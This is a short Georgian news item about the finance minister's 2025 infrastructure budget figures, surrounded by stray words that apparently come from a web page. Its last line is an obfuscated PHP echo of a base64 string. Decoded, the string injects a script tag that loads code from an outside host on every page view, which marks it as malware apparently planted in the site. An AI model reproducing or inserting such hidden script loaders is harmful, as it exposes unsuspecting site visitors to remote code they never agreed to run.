celsiusi
ავერსი jaluzi

 2025 წელს ნაერთი ბიუჯეტიდან ინფრასტრუქტურის განვითარებაზე მიიმართება 8 მილიარდ ლარამდე, - ამის შესახებ დღეს ბიუჯეტის განხიოლვისას ფინანსთა მინისტრმა ლაშა ხუციშვილმა ისაუბრა.

2025 წელს ნაერთი ბიუჯეტიდან ინფრასტრუქტურის განვითარებაზე მიიმართება 8 მილიარდ ლარამდე, მათ შორის:

• საგზაო ინფრასტრუქტურის გაუმჯობესებაზე მიიმართება 1 მილიარდ 400 მილიონ ლარამდე, მათ შორის, ჩქაროსნული მაგისტრალების მშენებლობას მოხმარდება 900 მილიონ ლარამდე;

• მუნიციპალური ინფრასტრუქტურის გაუმჯობესებისთვის გათვალისწინებულია 2 მილიარდ 600 მილიონ ლარამდე;

• წყალმომარაგებისა და წყალარინების სექტორის გაუმჯობესებაზე მიიმართება 500 მილიონ ლარზე მეტი, გარდა ამისა, გაერთიანებული წყალმომარაგების კომპანია 250 მილიონ ლარზე მეტს არსებული რესურსიდან მიმართავს ამავე სამუშაოებზე;

• საგანმანათლებლო ინფრასტრუქტურაზე მიიმართება 1 მილიარდ ლარზე მეტი;

• ტურისტული ინფრასტრუქტურის გაუმჯობესებაზე გათვალისწინებულია 150,0 მილიონ ლარზე მეტი;

• სპორტული ინფრასტრუქტურის მშენებლობა-რეაბილიტაციაზე, სამთავრობო პროგრამის შესაბამისად, გამოყოფილია 200 მილიონი ლარი, მათ შორის, გათვალისწინებულია თბილისში ახალი საფეხბურთო სტადიონის მშენებლობის დაწყება.

74
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");